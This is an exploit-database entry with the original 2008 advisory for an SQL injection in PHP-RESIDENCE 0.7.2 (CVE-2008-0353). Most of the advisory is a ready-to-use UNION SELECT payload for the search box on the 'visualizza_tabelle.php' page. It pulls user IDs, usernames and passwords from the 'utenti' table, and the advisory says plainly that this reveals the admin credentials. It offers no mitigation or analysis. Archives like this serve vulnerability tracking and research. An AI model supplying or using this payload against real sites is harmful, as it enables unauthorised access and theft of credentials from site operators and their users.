PHP-RESIDENCE 0.7.2 - 'Search' SQL Injection
Author: Khashayar Fereidani
type: webapps
platform: php
port:
date_added: 2008-01-15
date_updated: 2016-11-09
verified: 1
codes: OSVDB-40292;CVE-2008-0353
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comphp-residence_0.7.2.zip
#####################################################################################
#### PHPRESIDENCE 0.7.2 Remote Sql Injection ####
#### BY IRCRASH ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm) #
# #
#Script Download : http://www.digitaldruid.net/download/php-residence_0.7.2.zip #
# #
#Vulnerability Page: http://site.com/path/visualizza_tabelle.php?id_sessione=&anno=2006&tipo_tabella=clienti
# #
#Search query : 99999'union/**/select/**/idutenti,nome_utente,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/utenti/*
# #
#Help : Go Vulnerability Page and Type Search Query in the textbox . Now you can #
# see Admin Username And Password #
# #
# Our site : HTTP://IRCRASH.COM #
# #
#####################################################################################
# milw0rm.com [2008-01-16]